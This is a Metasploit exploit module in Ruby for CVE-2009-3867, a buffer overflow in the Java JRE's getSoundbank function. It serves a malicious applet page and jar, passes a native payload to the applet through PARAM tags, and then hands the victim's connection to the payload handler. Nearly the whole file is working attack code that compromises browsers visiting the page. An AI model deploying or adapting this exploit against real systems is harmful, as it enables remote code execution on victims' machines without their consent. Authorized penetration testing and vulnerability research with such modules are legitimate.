Path: blob/master/modules/exploits/multi/browser/java_getsoundbank_bof.rb
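##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  #
  # This module acts as an HTTP server: it serves an applet-loading HTML page
  # and a prebuilt applet jar read from the framework's data directory.
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  # Registers the module metadata (name, description, references, payload
  # constraints and the static target list) with the framework.
  #
  # @param info [Hash] module info supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Sun Java JRE getSoundbank file:// URI Buffer Overflow',
      'Description'    => %q{
          This module exploits a flaw in the getSoundbank function in the Sun JVM.

          The payload is serialized and passed to the applet via PARAM tags. It must be
          a native payload.

          The effected Java versions are JDK and JRE 6 Update 16 and earlier,
          JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and
          earlier, and SDK and JRE 1.3.1_26 and earlier.

          NOTE: Although all of the above versions are reportedly vulnerable, only
          1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'kf',    # Original PoC/exploit
          'jduck'  # metasploit version
        ],
      'References'     =>
        [
          [ 'CVE', '2009-3867' ],
          [ 'OSVDB', '59711' ],
          [ 'BID', '36881' ],
          [ 'ZDI', '09-076' ]
        ],
      'Payload'        =>
        {
          'Space' => 1024,
          'BadChars' => '',
          'DisableNops' => true,
        },
      'Platform'       => %w{ win osx },
      'Targets'        =>
        [
          # No automatic targetting for now ...
          #
          # [ 'J2SE 1.6_16 Automatic',
          #   {
          #     'Platform' => %w{ linux osx win },
          #     'Arch' => [ARCH_X86, ARCH_PPC]
          #   }
          # ],
          [ 'J2SE 1.6_16 on Windows x86',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ],
          [ 'J2SE 1.6_16 on Mac OS X PPC',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC,
            }
          ],
          [ 'J2SE 1.6_16 on Mac OS X x86',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2009-11-04'
    ))
  end

  # Loads the prebuilt applet jar into memory once, then starts the HTTP
  # server (super).
  #
  # File.binread reads the whole file in binary mode and closes the handle
  # even when the read raises; the previous open/read/close sequence left the
  # descriptor open on an exception.
  #
  # @raise [Errno::ENOENT] when the jar is missing from the data directory
  def exploit
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2009-3867.jar")
    @jar_data = File.binread(path)

    super
  end

  # Handles each HTTP request to the module's resource.
  #
  # A request whose path does not end in .jar receives the applet-loading
  # HTML (after a redirect that makes the path end in '/', so the relative
  # archive= reference resolves beneath this resource). A .jar request
  # receives the applet bytes, after which the connection is handed to the
  # payload handler.
  #
  # @param cli [Rex::Socket] the connected client
  # @param req [Rex::Proto::Http::Request] the parsed request
  def on_request_uri(cli, req)
    now = Time.now.to_i

    # Per-client-address cache: when the address was last seen and which
    # target was picked for it, so a later applet request can be matched to
    # the HTML request that preceded it.
    @targetcache ||= {}
    @targetcache[cli.peerhost] ||= {}
    @targetcache[cli.peerhost][:update] = now

    # User-Agent based target selection. Only reachable when an 'Automatic'
    # target is registered; the target list above currently has none, so this
    # branch is inert until that entry is restored.
    if target.name =~ /Automatic/
      case req.headers['User-Agent']
      when /Windows/i
        print_status("Choosing a Windows target")
        @targetcache[cli.peerhost][:target] = targets[1]
      when /PPC Mac OS X/i
        print_status("Choosing a Mac OS X PPC target")
        @targetcache[cli.peerhost][:target] = targets[2]
      when /Intel Mac OS X/i
        print_status("Choosing a Mac OS X x86 target")
        @targetcache[cli.peerhost][:target] = targets[3]
      else
        print_status("Unknown target for: #{req.headers['User-Agent']}")
      end
    end

    # Evict entries not refreshed within the last 60 seconds. The single
    # timestamp taken above keeps the comparison consistent across keys.
    @targetcache.delete_if { |_addr, entry| now > entry[:update] + 60 }

    # \z rather than $: $ also matches before an embedded newline, so it is
    # not a whole-string test.
    unless req.uri.match(/\.jar\z/i)
      # Redirect so the path ends with '/', making the applet's relative
      # archive reference resolve under this resource.
      unless req.uri.end_with?('/')
        print_status("Sending redirect so path ends with / ...")
        send_redirect(cli, get_resource() + '/', '')
        return
      end

      print_status("Sending HTML")
      send_response_html(cli, generate_html(payload.encoded),
        {
          'Content-Type' => 'text/html',
          'Pragma' => 'no-cache'
        })
      return
    end

    print_status("Sending applet")
    send_response(cli, generate_applet(cli, req),
      {
        'Content-Type' => 'application/octet-stream',
        'Pragma' => 'no-cache'
      })

    # Hand the connection over to the payload handler
    handler(cli)
  end

  # Builds the HTML page that embeds the applet.
  #
  # The jar is referenced under a random 32-character alphanumeric name, and
  # the payload (padded with random bytes to a multiple of 4) and a 4-byte
  # 0x90 block are passed to the applet as hex-encoded PARAM values.
  #
  # @param pl [String] the encoded native payload
  # @return [String] the finished HTML document
  def generate_html(pl)
    html = <<-EOF
<html>
<head>
<!-- <meta http-equiv=refresh content=10 /> -->
</head>
<body>
<applet width='100%' height='100%' code='AppletX' archive='JARNAME'>
<param name='sc' value='SCODE' />
<param name='np' value='NOPS' />
</applet>
</body>
</html>
EOF

    jar_name = rand_text_alphanumeric(32) + '.jar'
    html.gsub!(/JARNAME/, jar_name)

    # Set to true to prefix a 0xCC byte and hex-dump the payload while debugging
    debug_payload = false
    pload = ""
    pload << "\xcc" if debug_payload
    pload << pl
    # Pad to a multiple of 4 bytes (presumably what the applet expects; the
    # applet source is not part of this file).
    remainder = pload.length % 4
    pload << rand_text(4 - remainder) if remainder > 0
    print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload)) if debug_payload
    html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))

    nops = "\x90\x90\x90\x90"
    html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))

    html
  end

  # Returns the applet bytes for a .jar request.
  #
  # With an 'Automatic' target the jar is only served to a client whose
  # User-Agent was recognised in on_request_uri. The selected target is not
  # needed here because the jar is static, so it is no longer looked up.
  #
  # @param cli [Rex::Socket] the connected client
  # @param req [Rex::Proto::Http::Request] the parsed request (unused)
  # @return [String] the jar loaded in #exploit, or '' when no target was resolved
  def generate_applet(cli, req)
    return '' if target.name =~ /Automatic/ && !@targetcache[cli.peerhost][:target]

    @jar_data
  end
end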